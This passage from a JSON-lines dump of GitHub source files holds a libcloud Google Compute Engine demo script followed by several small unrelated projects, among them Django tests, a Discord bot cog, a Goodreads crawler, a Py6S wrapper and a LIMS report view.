# https://developers.google.com/compute/docs/load-balancing/lb-quickstart\n\n # == Clean-up and existing demo resources ==\n all_nodes = gce.list_nodes(ex_zone=\"all\")\n firewalls = gce.ex_list_firewalls()\n display('Cleaning up any \"%s\" resources' % DEMO_BASE_NAME)\n clean_up(gce, DEMO_BASE_NAME, all_nodes, balancers + healthchecks + firewalls)\n\n # == Create 3 nodes to balance between ==\n startup_script = (\n \"apt-get -y update && \" \"apt-get -y install apache2 && \" \"hostname > /var/www/index.html\"\n )\n tag = \"%s-www\" % DEMO_BASE_NAME\n base_name = \"%s-www\" % DEMO_BASE_NAME\n image = gce.ex_get_image(\"debian-7\")\n size = gce.ex_get_size(\"n1-standard-1\")\n number = 3\n display(\"Creating %d nodes\" % number)\n metadata = {\"items\": [{\"key\": \"startup-script\", 
\"value\": startup_script}]}\n lb_nodes = gce.ex_create_multiple_nodes(\n base_name,\n size,\n image,\n number,\n ex_tags=[tag],\n ex_metadata=metadata,\n ex_disk_auto_delete=True,\n ignore_errors=False,\n )\n display(\"Created Nodes\", lb_nodes)\n\n # == Create a Firewall for instances ==\n display(\"Creating a Firewall\")\n name = \"%s-firewall\" % DEMO_BASE_NAME\n allowed = [{\"IPProtocol\": \"tcp\", \"ports\": [\"80\"]}]\n firewall = gce.ex_create_firewall(name, allowed, target_tags=[tag])\n display(\" Firewall %s created\" % firewall.name)\n\n # == Create a Health Check ==\n display(\"Creating a HealthCheck\")\n name = \"%s-healthcheck\" % DEMO_BASE_NAME\n\n # These are all the default values, but listed here as an example. To\n # create a healthcheck with the defaults, only name is required.\n hc = gcelb.ex_create_healthcheck(\n name,\n host=None,\n path=\"/\",\n port=\"80\",\n interval=5,\n timeout=5,\n unhealthy_threshold=2,\n healthy_threshold=2,\n )\n display(\"Healthcheck %s created\" % hc.name)\n\n # == Create Load Balancer ==\n display(\"Creating Load Balancer\")\n name = \"%s-lb\" % DEMO_BASE_NAME\n port = 80\n protocol = \"tcp\"\n algorithm = None\n members = lb_nodes[:2] # Only attach the first two initially\n healthchecks = [hc]\n balancer = gcelb.create_balancer(\n name, port, protocol, algorithm, members, ex_healthchecks=healthchecks\n )\n display(\" Load Balancer %s created\" % balancer.name)\n\n # == Attach third Node ==\n display(\"Attaching additional node to Load Balancer\")\n member = balancer.attach_compute_node(lb_nodes[2])\n display(\" Attached {} to {}\".format(member.id, balancer.name))\n\n # == Show Balancer Members ==\n members = balancer.list_members()\n display(\"Load Balancer Members\")\n for member in members:\n display(\" ID: {} IP: {}\".format(member.id, member.ip))\n\n # == Remove a Member ==\n display(\"Removing a Member\")\n detached = members[0]\n detach = balancer.detach_member(detached)\n if detach:\n display(\" Member {} detached from {}\".format(detached.id, balancer.name))\n\n # == Show Updated Balancer Members ==\n members = balancer.list_members()\n display(\"Updated Load Balancer Members\")\n for member in members:\n display(\" ID: {} IP: {}\".format(member.id, member.ip))\n\n # == Reattach Member ==\n display(\"Reattaching Member\")\n member = balancer.attach_member(detached)\n display(\" Member {} attached to {}\".format(member.id, balancer.name))\n\n # == Test Load Balancer by connecting to it multiple times ==\n PAUSE = 60\n display(\"Sleeping for %d seconds for LB members to serve...\" % PAUSE)\n time.sleep(PAUSE)\n rounds = 200\n url = \"http://%s/\" % balancer.ip\n line_length = 75\n display(\"Connecting to {} {} times\".format(url, rounds))\n for x in range(rounds):\n response = url_req.urlopen(url)\n output = str(response.read(), encoding=\"utf-8\").strip()\n if \"www-001\" in output:\n padded_output = output.center(line_length)\n elif \"www-002\" in output:\n padded_output = output.rjust(line_length)\n else:\n padded_output = output.ljust(line_length)\n sys.stdout.write(\"\\r%s\" % padded_output)\n sys.stdout.flush()\n time.sleep(0.25)\n\n print(\"\")\n if CLEANUP:\n balancers = gcelb.list_balancers()\n healthchecks = gcelb.ex_list_healthchecks()\n nodes = gce.list_nodes(ex_zone=\"all\")\n firewalls = gce.ex_list_firewalls()\n\n display(\"Cleaning up %s resources created\" % DEMO_BASE_NAME)\n clean_up(gce, DEMO_BASE_NAME, nodes, balancers + healthchecks + firewalls)\n\n end_time = datetime.datetime.now()\n display(\"Total runtime: 
%s\" % str(end_time - start_time))\n\n\n# ==== BACKEND SERVICE LOAD BALANCER CODE STARTS HERE ====\ndef main_backend_service():\n start_time = datetime.datetime.now()\n display(\"Backend Service w/Global Forwarding Rule demo/test start time: %s\" % str(start_time))\n gce = get_gce_driver()\n # Get project info and print name\n project = gce.ex_get_project()\n display(\"Project: %s\" % project.name)\n\n # Based on the instructions at:\n # https://cloud.google.com/compute/docs/load-balancing/http/#overview\n\n zone_central = DATACENTER\n zone_east = BACKUP_DATACENTER\n it_name = \"%s-instancetemplate\" % DEMO_BASE_NAME\n mig_name = \"%s-mig\" % DEMO_BASE_NAME\n hc_name = \"%s-healthcheck\" % DEMO_BASE_NAME\n bes_name = \"%s-bes\" % DEMO_BASE_NAME\n urlmap_name = \"%s-urlmap\" % DEMO_BASE_NAME\n targethttpproxy_name = \"%s-httptargetproxy\" % DEMO_BASE_NAME\n address_name = \"%s-address\" % DEMO_BASE_NAME\n gfr_name = \"%s-gfr\" % DEMO_BASE_NAME\n firewall_name = \"%s-firewall\" % DEMO_BASE_NAME\n\n startup_script = (\n \"apt-get -y update && \"\n \"apt-get -y install apache2 && \"\n 'echo \"$(hostname)\" > /var/www/html/index.html'\n )\n tag = \"%s-mig-www\" % DEMO_BASE_NAME\n metadata = {\"items\": [{\"key\": \"startup-script\", \"value\": startup_script}]}\n\n mig_central = None\n mig_east = None\n bes = None\n urlmap = None\n tp = None\n address = None\n gfr = None\n firewall = None\n\n display(\"Create a BackendService\")\n # == Create an Instance Template ==\n it = gce.ex_create_instancetemplate(\n it_name,\n size=\"n1-standard-1\",\n image=\"debian-8\",\n network=\"default\",\n metadata=metadata,\n tags=[tag],\n )\n display(' InstanceTemplate \"%s\" created' % it.name)\n\n # == Create a MIG ==\n mig_central = create_mig(gce, mig_name, zone_central, it, \"central\")\n mig_east = create_mig(gce, mig_name, zone_east, it, \"east\")\n\n # == Create a Health Check ==\n hc = gce.ex_create_healthcheck(\n hc_name,\n host=None,\n path=\"/\",\n port=\"80\",\n interval=30,\n timeout=10,\n unhealthy_threshold=10,\n healthy_threshold=1,\n )\n display(\" Healthcheck %s created\" % hc.name)\n\n # == Create a Backend Service ==\n be_central = gce.ex_create_backend(instance_group=mig_central.instance_group)\n be_east = gce.ex_create_backend(instance_group=mig_east.instance_group)\n bes = gce.ex_create_backendservice(\n bes_name,\n [hc],\n backends=[be_central, be_east],\n port_name=\"%s-http\" % DEMO_BASE_NAME,\n protocol=\"HTTP\",\n description=\"%s bes desc\" % DEMO_BASE_NAME,\n timeout_sec=60,\n enable_cdn=False,\n )\n display(' Backend Service \"%s\" created' % bes.name)\n\n # == Create a URLMap ==\n urlmap = gce.ex_create_urlmap(urlmap_name, default_service=bes)\n display(' URLMap \"%s\" created' % urlmap.name)\n\n # == Create a Target (HTTP) Proxy ==\n tp = gce.ex_create_targethttpproxy(targethttpproxy_name, urlmap)\n display(' TargetProxy \"%s\" created' % tp.name)\n\n # == Create a Static Address ==\n address = gce.ex_create_address(address_name, region=\"global\")\n display(' Address \"{}\" created with IP \"{}\"'.format(address.name, address.address))\n # == Create a Global Forwarding Rule ==\n gfr = gce.ex_create_forwarding_rule(\n gfr_name,\n target=tp,\n address=address,\n port_range=\"80\",\n description=\"%s libcloud forwarding rule http test\" % DEMO_BASE_NAME,\n global_rule=True,\n )\n display(' Global Forwarding Rule \"%s\" created' % (gfr.name))\n\n # == Create a Firewall for instances ==\n allowed = [{\"IPProtocol\": \"tcp\", \"ports\": [\"80\"]}]\n firewall = 
gce.ex_create_firewall(firewall_name, allowed, target_tags=[tag])\n    display(\" Firewall %s created\" % firewall.name)\n\n    # TODO(supertom): launch instances to demonstrate that it works,\n    # take backends out of service. Adding in this functionality\n    # will also add 10-15 minutes to the demo.\n    # display(\"Sleeping for 10 minutes, starting at %s\" %\n    # str(datetime.datetime.now()))\n    # time.sleep(600)\n\n    if CLEANUP:\n        display(\"Cleaning up %s resources created\" % DEMO_BASE_NAME)\n        clean_up(\n            gce,\n            DEMO_BASE_NAME,\n            None,\n            resource_list=[\n                firewall,\n                gfr,\n                address,\n                tp,\n                urlmap,\n                bes,\n                hc,\n                mig_central,\n                mig_east,\n                it,\n            ],\n        )\n    end_time = datetime.datetime.now()\n    display(\"Total runtime: %s\" % str(end_time - start_time))\n\n\n# ==== GOOGLE DNS CODE STARTS HERE ====\ndef main_dns():\n    start_time = datetime.datetime.now()\n    display(\"DNS demo/test start time: %s\" % str(start_time))\n    gce = get_gce_driver()\n    gdns = get_dns_driver()\n    # Get project info and print name\n    project = gce.ex_get_project()\n    display(\"Project: %s\" % project.name)\n\n    # Get list of managed zones\n    zones = gdns.iterate_zones()\n    display(\"Zones\", zones)\n\n    # Get list of records\n    zones = gdns.iterate_zones()\n    for z in zones:\n        records = gdns.iterate_records(z)\n        display('Records for managed zone \"%s\"' % z.id, records)\n\n    # TODO(erjohnso): Finish this DNS section. Challenging in that you need to\n    # own a domain, so testing will require user customization. Perhaps a new\n    # command-line required flag unless --skip-dns is supplied. Also, real\n    # e2e testing should try to do DNS lookups on new records, but DNS TTL\n    # and propagation delays will introduce limits on what can be tested.\n\n    end_time = datetime.datetime.now()\n    display(\"Total runtime: %s\" % str(end_time - start_time))\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description=\"Google Cloud Platform Demo / Live Test Script\")\n    parser.add_argument(\n        \"--compute\",\n        help=\"perform compute demo / live tests\",\n        dest=\"compute\",\n        action=\"store_true\",\n    )\n    parser.add_argument(\n        \"--load-balancer\",\n        help=\"perform load-balancer demo / live tests\",\n        dest=\"lb\",\n        action=\"store_true\",\n    )\n    parser.add_argument(\n        \"--backend-service\",\n        help=\"perform backend-service demo / live tests\",\n        dest=\"bes\",\n        action=\"store_true\",\n    )\n    parser.add_argument(\n        \"--dns\", help=\"perform DNS demo / live tests\", dest=\"dns\", action=\"store_true\"\n    )\n    parser.add_argument(\n        \"--cleanup-only\",\n        help=\"perform clean-up (skips all tests)\",\n        dest=\"cleanup\",\n        action=\"store_true\",\n    )\n    cl_args = parser.parse_args()\n\n    if cl_args.cleanup:\n        cleanup_only()\n    else:\n        if cl_args.compute:\n            main_compute()\n        if cl_args.lb:\n            main_load_balancer()\n        if cl_args.dns:\n            main_dns()\n        if cl_args.bes:\n            main_backend_service()\n","repo_name":"apache/libcloud","sub_path":"demos/gce_demo.py","file_name":"gce_demo.py","file_ext":"py","file_size_in_byte":34855,"program_lang":"python","lang":"en","doc_type":"code","stars":1969,"dataset":"github-code","pt":"37"} +{"seq_id":"74590994986","text":"import itertools\n\nwith open(\"data/rosalind_perm.txt\", \"r\") as sample:\n    sample_input = sample.readlines()\n    #Using join to pull the number out of the list and int() to turn it into an integer\n    #I also had to add 1 to the number, because the starting point to count is 0\n    sample_int = int(\"\".join(sample_input)) + 1\n    sample_list = []\n\nfor i in range(1,sample_int):\n    sample_list.append(i)\n\n#Getting permutations
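\n#Aside (not part of the original solution): n! grows quickly (3 -> 6, 7 -> 5040),\n#so for a large range it is better to stream the tuples than to build the full list:\n#    for perm in itertools.permutations(sample_list):\n#        print(*perm)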
\npermutation = list(itertools.permutations(sample_list))\n\nprint(len(permutation))\nfor item in permutation:\n print(*item)\n","repo_name":"felipevzps/rosalind.info","sub_path":"Bioinformatics Stronghold/#19 Enumerating Gene Orders.py","file_name":"#19 Enumerating Gene Orders.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25615539269","text":"import discord\nfrom discord.ext import commands\nfrom discord.utils import get\n\nclass c279(commands.Cog, name=\"c279\"):\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n @commands.command(name='Hex_of_Arthrophobia', aliases=['c279', 'Hex_3'])\n async def example_embed(self, ctx):\n embed = discord.Embed(title='Hex of Arthrophobia',\n color=0x1D9E74)\n embed.set_thumbnail(url='https://www.duelingbook.com/images/custom-pics/2300000/2360772.jpg')\n\n embed.add_field(name='Status (Archetype)', value='Casual:3/Tournament:3 (Hex)', inline=True)\n embed.add_field(name='Type', value='Spell/Quick-Play', inline=False)\n embed.add_field(name='Card Effect', value='Discard 1 card and target 1 face-up monster on the field; that monster\\'s original ATK becomes halved until the end of this turn. During your End Phase, if a DARK monster you control was sent to the GY the turn you activated this card: You can add 1 \"Hex\" Spell from your GY to your hand, except \"Hex of Arthrophobia\".', inline=False)\n embed.set_footer(text='Set Code: ANCF')\n\n await ctx.send(embed=embed)\n\ndef setup(bot: commands.Bot):\n bot.add_cog(c279(bot))","repo_name":"ProfessorSean/Kasutamaiza","sub_path":"upcfcardsearch/c279.py","file_name":"c279.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21215455322","text":"from ctypes import resize\nfrom unittest import TestCase\n\nfrom recipes.models import Ingredient, Recipe\nfrom recipes.templatetags.resizer import resize_to\n\n\n# def resize_to(ingredient, target):\n# servings = ingredient.recipe.servings\n# if servings is not None and target is not None:\n# try:\n# ratio = int(target) / servings\n# return ingredient.amount * ratio\n# except ValueError\n# pass\n# return ingredient.amount\n\n\nclass ResizeToTests(TestCase):\n def test_no_resize(self):\n # Arrange\n\n # Act\n\n # Assert\n with self.assertRaises(AttributeError):\n resize_to(None, 3)\n # assertRaises checks to see if error is raised\n\n def test_recipe_has_no_serving(self):\n # Arrange\n recipe = Recipe(servings=None)\n ingredient = Ingredient(recipe=recipe, amount=5)\n\n # Act\n result = resize_to(ingredient, None)\n\n # Assert\n self.assertEqual(5, result)\n # assertEqual checks to see if those values are returned\n\n def test_resize_to_is_none(self):\n # Arrange\n recipe = Recipe(servings=2)\n ingredient = Ingredient(recipe=recipe, amount=5)\n\n # Act\n result = resize_to(ingredient, None)\n\n # Assert\n self.assertEqual(5, result)\n\n def test_values_for_servings_amount_and_target(self):\n # Arrange\n recipe = Recipe(servings=2)\n ingredient = Ingredient(recipe=recipe, amount=5)\n \n # Act\n result = resize_to(ingredient, 10)\n \n # Assert\n self.assertEqual(25, result)\n\n def test_target_is_letters(self):\n # Arrange\n recipe = Recipe(servings=2)\n ingredient = Ingredient(recipe=recipe, amount=5)\n # Act\n result = resize_to(ingredient, \"abc\")\n # Assert\n self.assertEqual(5, 
result)\n","repo_name":"j8ycey/Scrumptious","sub_path":"recipes/test_filters.py","file_name":"test_filters.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44434569448","text":"\"\"\"ta dando agora\n\nRevision ID: fe375fa1c32d\nRevises: 1a3498493247\nCreate Date: 2023-11-14 21:34:26.276952\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fe375fa1c32d'\ndown_revision = '1a3498493247'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('post', schema=None) as batch_op:\n batch_op.add_column(sa.Column('title', sa.String(length=60), nullable=True))\n batch_op.alter_column('body',\n existing_type=sa.VARCHAR(length=140),\n type_=sa.String(length=300),\n existing_nullable=True)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('post', schema=None) as batch_op:\n batch_op.alter_column('body',\n existing_type=sa.String(length=300),\n type_=sa.VARCHAR(length=140),\n existing_nullable=True)\n batch_op.drop_column('title')\n\n # ### end Alembic commands ###\n","repo_name":"vgsong/vgexcel","sub_path":"migrations/versions/fe375fa1c32d_ta_dando_agora.py","file_name":"fe375fa1c32d_ta_dando_agora.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20816323781","text":"__author__ = 'Simo'\nfrom models import *\nfrom goodreads import Goodreads\nfrom cassandracustom import Cassandra\nfrom cassandra.cqlengine.management import sync_table, sync_type\nfrom cassandra.cqlengine.query import DoesNotExist, MultipleObjectsReturned\nfrom outils import space, initialize_logger\nfrom cassandra.query import SimpleStatement\nimport datetime\nfrom uuid import uuid4, UUID\nfrom types import ListType\nimport time\nimport logging\nimport os.path\nimport coloredlogs\nimport random\n\n#Get more details of the books (list of shelves, and general details)\ndef getBookDetails(c, g):\n while (True):\n rows = c.getSession().execute('SELECT id,gid FROM prs.books WHERE shelves_retrieved=false')\n skip = 0\n for row in rows:\n if (skip > 0):\n skip -= 1\n logging.warning(\"Skipping %d\", skip)\n continue\n b = c.getSession().execute('SELECT shelves_retrieved FROM prs.books WHERE id=%s', (row['id'],))\n if b[0]['shelves_retrieved'] == True:\n logging.warning(\"Shelve already retrieved for book %s %s\", row['id'], row['gid'])\n skip = int(random.random()*20)\n continue\n else:\n logging.info(\"Retrieving shelves for %s %s\", row['id'], row['gid'])\n book, similarBook = g.getBook(int(row['gid']))\n if (book is None):\n b = Books.get(gid=int(row['gid']))\n b.error_retrieving_shelves = True\n b.save()\n continue\n else:\n b = c.getSession().execute('SELECT shelves_retrieved FROM prs.books WHERE id=%s', (row['id'],))\n if (b[0]['shelves_retrieved'] == True):\n logging.warning(\"Shelve already retrieved for book %s %s\", row['id'], row['gid'])\n skip = int(random.random()*20)\n continue\n logging.info(\"books %s %s retrieved\", row['id'], row['gid'])\n c.updateSmallBook(book, row['id'])\n logging.info(\"Finish saving %s %s\", row['id'], row['gid'])\n time.sleep(5)\n\n#Sync the model to Cassandra\ndef syncTables():\n sync_table(Books)\n sync_table(Shelves)\n 
sync_table(Authors)\n sync_table(Users)\n sync_table(Reviews)\n\n#Init cassandra and goodreads api\ndef init():\n initialize_logger(os.getcwd())\n coloredlogs.install(level='DEBUG')\n coloredlogs.ColoredFormatter()\n c = Cassandra()\n syncTables()\n g = Goodreads()\n return (c, g)\n\n\nif __name__ == \"__main__\":\n c, g = init()\n u = c.get_user_if_exsists_or_save(Users(id=uuid.uuid4(), gid=47225465,\n name='Simone', friends_count=1,\n small_user=True))\n getBookDetails(c, g)\n","repo_name":"Simone-cogno/MT-Product-Recommender-System_improved-with-social-network-information","sub_path":"Sources/GoodreadsPythonAPI/get_bookDetails.py","file_name":"get_bookDetails.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31793753725","text":"import hashlib\nimport urllib\n\nfrom django import template\nfrom django.utils.safestring import mark_safe\nfrom products.models import ProductUserAction\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef param_replace(context, **kwargs):\n d = context['request'].GET.copy()\n for k, v in kwargs.items():\n d[k] = v\n for k in [k for k, v in d.items() if not v]:\n del d[k]\n return d.urlencode()\n\n\n@register.filter\ndef as_percentage_of(part, whole):\n try:\n return \"%d%%\" % (float(part) / float(whole) * 100)\n except (ValueError, ZeroDivisionError, TypeError):\n return \"0\"\n\n\n\n@register.filter\ndef gravatar_url(email, size=20):\n default = \"https://www.minervastrategies.com/wp-content/uploads/2016/03/default-avatar.jpg\"\n return \"https://www.gravatar.com/avatar/%s?%s\" % (hashlib.md5(email.lower().encode()).hexdigest(), urllib.parse.urlencode({'d': default, 's': str(size)}))\n\n\n@register.filter\ndef gravatar(email, size=20):\n url = gravatar_url(email, size)\n return mark_safe('' % (url, size, size))\n\n\n@register.filter\ndef get_rate_user(user, product):\n rate = ProductUserAction.objects.filter(product=product, user=user).first()\n if rate:\n return rate.rate\n else:\n return 0\n\n\n@register.filter\ndef declination(val, words):\n value = abs(int(val)) % 100\n num = value % 10\n if value > 10 and value < 20:\n return f'{val} {words[2]}'\n if num > 1 and num < 5:\n\t return f'{val} {words[1]}'\n if num == 1:\n\t return f'{val} {words[0]}'\n return f'{val} {words[2]}'","repo_name":"Eternlyours/bem-store-v1","sub_path":"store/templatetags/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9249146178","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis file is part of the complex_terrain algorithm\nM. Lamare, M. Dumont, G. 
Picard (IGE, CEN).\n\"\"\"\nimport numpy as np\nimport Py6S as ps\n\n\nclass rtmodel(object):\n \"\"\"\n \"\"\"\n def __init__(self):\n self.outputs = None\n\n def run(self, sza, saa, vza, vaa, wvl, alt, aero,\n aod=0.1, refl=0.99, water=0.05, ozone=0.30, atmo=None, atcor=False,\n ):\n \"\"\" Run PY6S\n date = datetime object specifying the day and month of acquisition\n lat = latitude of point considered (in degrees)\n sza, saa, vza, vaa = viewing angles input in radians\n wvl = wavelength in namometers\n alt_km =\n profile has to be one of the following:\n \"\"\"\n\n # Convert nanometer input into um for the model\n wvl_um = wvl / 1000\n alt_km = alt / 1000\n\n # Build aero profiles\n aero_profiles = {\n \"Continental\": ps.AeroProfile.Continental,\n \"BiomassBurning\": ps.AeroProfile.BiomassBurning,\n \"Desert\": ps.AeroProfile.Desert,\n \"Maritime\": ps.AeroProfile.Maritime,\n \"Stratospheric\": ps.AeroProfile.Stratospheric,\n \"Urban\": ps.AeroProfile.Urban,\n \"None\": ps.AeroProfile.NoAerosols,\n }\n\n # Generate a 6S class\n s = ps.SixS()\n\n # Add geometry\n s.geometry = ps.Geometry.User()\n\n # Convert angles in radians to degrees\n s.geometry.solar_z = np.rad2deg(sza)\n s.geometry.view_z = np.rad2deg(vza)\n s.geometry.solar_a = np.rad2deg(saa)\n s.geometry.view_a = np.rad2deg(vaa)\n\n # s.geometry.day = date.day\n # s.geometry.month = date.month\n\n # Set altitudes\n s.altitudes = ps.Altitudes()\n s.altitudes.set_target_custom_altitude(alt_km)\n s.altitudes.set_sensor_satellite_level()\n\n s.wavelength = ps.Wavelength(wvl_um) # Set wavelength in um\n\n # Atmosphere parameters\n if atmo is None:\n\n # If no standard atmospheric profile is specified, use water and\n # ozone.\n s.atmos_profile = ps.AtmosProfile.UserWaterAndOzone(water, ozone)\n else:\n\n # Build atmo dictionnary\n atmo_profiles = {\n \"Mid_lat_summer\": ps.AtmosProfile.MidlatitudeSummer,\n \"Mid_lat_winter\": ps.AtmosProfile.MidlatitudeWinter,\n \"Sub_arctic_summer\": ps.AtmosProfile.SubarcticSummer,\n \"Sub_arctic_winter\": ps.AtmosProfile.SubarcticWinter,\n \"Tropical\": ps.AtmosProfile.Tropical,\n \"None\": ps.AtmosProfile.NoGaseousAbsorption,\n }\n # Run a standard atmospheric profile\n s.atmos_profile = ps.AtmosProfile.PredefinedType(\n atmo_profiles[atmo])\n\n # Aerosol parameters\n s.aero_profile = ps.AeroProfile.PredefinedType(aero_profiles[aero])\n\n s.aot550 = aod\n\n # According to switch, perform atmospheric correction or not\n if atcor:\n s.atmos_corr = ps.AtmosCorr.AtmosCorrLambertianFromReflectance(\n refl)\n else:\n s.ground_reflectance = ps.GroundReflectance.HomogeneousLambertian(\n refl\n )\n\n s.run() # Run Py6S\n\n self.outputs = s.outputs\n","repo_name":"maximlamare/REDRESS","sub_path":"redress/rtmodel/python_6S.py","file_name":"python_6S.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"40636647221","text":"import subprocess\nimport sys\n\ndef GetEnv(arch):\n \"\"\"Gets the saved environment from a file for a given architecture.\"\"\"\n # The environment is saved as an \"environment block\" (see CreateProcess\n # and msvs_emulation for details). We convert to a dict here.\n # Drop last 2 NULs, one for list terminator, one for trailing vs. 
separator.\n pairs = open(arch).read()[:-2].split('\\0')\n kvs = [item.split('=', 1) for item in pairs]\n return dict(kvs)\n\ndef main(arch, *args):\n \"\"\"Filter logo banner from invocations of asm.exe.\"\"\"\n env = GetEnv(arch)\n popen = subprocess.Popen(args, shell=True, env=env, universal_newlines=True,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n out, _ = popen.communicate()\n for line in out.splitlines():\n if (not line.startswith('Copyright (C) Microsoft Corporation') and\n not line.startswith('Microsoft (R) Macro Assembler') and\n not line.startswith(' Assembling: ') and\n line):\n print(line)\n return popen.returncode\n\nif __name__ == '__main__':\n sys.exit(main(*sys.argv[1:]))\n","repo_name":"ndsol/volcano","sub_path":"src/gn/toolchain/win/asm_wrapper.py","file_name":"asm_wrapper.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"9999451740","text":"from django.urls import path\nfrom apps.github_task import views\n\n\nurlpatterns = [\n path('edit/', views.edittask, name='edit'),\n path('', views.task, name='task'),\n path('all/', views.all_task, name='alltask'),\n path('delitem/', views.delitem, name='delitem')\n]","repo_name":"MisakiKata/github_monitor","sub_path":"apps/github_task/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1397490948","text":"from Products.ATContentTypes.lib import constraintypes\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom bika.lims.browser import BrowserView\nfrom plone import api\nfrom plone.app.layout.viewlets import ViewletBase\nfrom baobab.lims.browser.project import *\nfrom baobab.lims.browser.project.util import SampleGeneration\nfrom baobab.lims.interfaces import IUnmanagedStorage, IStoragePosition, IManagedStorage\nfrom baobab.lims.permissions import ManageKits\nfrom Products.CMFCore.utils import getToolByName\n\nfrom bika.lims.utils import tmpID\nfrom bika.lims.utils import to_utf8\nfrom bika.lims.utils import encode_header\nfrom bika.lims.utils import createPdf\nfrom bika.lims.utils import attachPdf\nfrom bika.lims.utils.sample import create_sample\nfrom bika.lims.utils.samplepartition import create_samplepartition\nimport datetime\n\n\nclass DownloadVGAReport(BrowserView):\n\n template = ViewPageTemplateFile(\"templates/download_viral_genomic_analysis_report.pt\")\n\n def __init__(self, context, request):\n super(DownloadVGAReport, self).__init__(context, request)\n self.context = context\n self.request = request\n self.pc = getToolByName(self.context, 'portal_catalog')\n\n def __call__(self):\n self.prepare_overhead_data()\n self.prepare_report()\n self.now = datetime.datetime.now()\n pdf_data = createPdf(htmlreport=self.template())\n\n date = datetime.datetime.now().strftime(\"%Y%m%d%H%M\")\n setheader = self.request.RESPONSE.setHeader\n setheader(\"Content-type\", \"application/pdf\")\n setheader(\"Content-Disposition\",\n \"attachment;filename=\\\"viral_genomic_analysis_%s.pdf\\\"\" % date)\n\n self.request.RESPONSE.write(pdf_data)\n\n def prepare_report(self):\n self.title = self.context.Title()\n self.date_created = self.context.getDateCreated()\n self.project = self.context.getProject().Title()\n self.prepared_viral_loads = self.context.prepare_viral_load_data()\n\n def prepare_overhead_data(self):\n\n pc = self.portal_catalog\n self.checkPermission = 
self.context.portal_membership.checkPermission\n self.SamplingWorkflowEnabled = self.context.bika_setup.getSamplingWorkflowEnabled()\n\n # Client details (if client is associated)\n project = self.context.getProject()\n client = project.getClient()\n\n if client:\n self.client = client\n client_address = self.client.getPostalAddress()\n if not client_address:\n client_address = self.contact.getBillingAddress()\n if not client_address:\n client_address = self.contact.getPhysicalAddress()\n if client_address:\n _keys = ['address', 'city', 'state', 'zip', 'country']\n _list = [client_address.get(v) for v in _keys if client_address.get(v)]\n self.client_address = \"
    \".join(_list).replace(\"\\n\", \"
    \")\n if self.client_address.endswith(\"
    \"):\n self.client_address = self.client_address[:-5]\n else:\n self.client_address = None\n\n # Reporter\n self.member = self.context.portal_membership.getAuthenticatedMember()\n self.username = self.member.getUserName()\n self.reporter = self.user_fullname(self.username)\n self.reporter_email = self.user_email(self.username)\n self.reporter_signature = \"\"\n c = [x for x in self.bika_setup_catalog(portal_type='LabContact')\n if x.getObject().getUsername() == self.username]\n if c:\n sf = c[0].getObject().getSignature()\n if sf:\n self.reporter_signature = sf.absolute_url() + \"/Signature\"\n\n # laboratory\n self.laboratory = self.context.bika_setup.laboratory\n self.accredited = self.laboratory.getLaboratoryAccredited()\n lab_address = self.laboratory.getPrintAddress()\n\n if lab_address:\n self.lab_address = lab_address\n else:\n self.lab_address = None\n\n\n\n\n\n\n\n\n\n","repo_name":"BaobabLims/baobab.lims","sub_path":"baobab/lims/browser/viral_genomic_analysis/download_report.py","file_name":"download_report.py","file_ext":"py","file_size_in_byte":4097,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"37"} +{"seq_id":"72062685868","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 14 21:05:42 2020\r\n\r\n@author: Ria\r\n\"\"\"\r\n\r\nDILITHIUM_MODE = 2\r\nfrom params import *\r\nimport array\r\nimport numpy as np\r\nfrom fips202 import *\r\nfrom reduce import * \r\nclass poly:\r\n def __init__(self,coeffs):\r\n self.coeffs = []# Poly Lib Implement vector poly vec[L]\r\n \r\n \r\n\"\"\" /*************************************************\r\n* Name: poly_reduce\r\n*\r\n* Description: Inplace reduction of all coefficients of polynomial to\r\n* representative in [-6283009,6283007].\r\n*\r\n* Arguments: - poly *a: pointer to input/output polynomial\r\n**************************************************/\"\"\"\r\n\r\ndef poly_reduce(poly_a):\r\n for i in range (N):\r\n poly_a.coeffs[i] = reduce32(poly_a.coeffs[i])\r\n\r\n\r\n\"\"\" \r\n/*************************************************\r\n* Name: poly_caddq\r\n*\r\n* Description: For all coefficients of in/out polynomial add Q if\r\n* coefficient is negative.\r\n*\r\n* Arguments: - poly *a: pointer to input/output 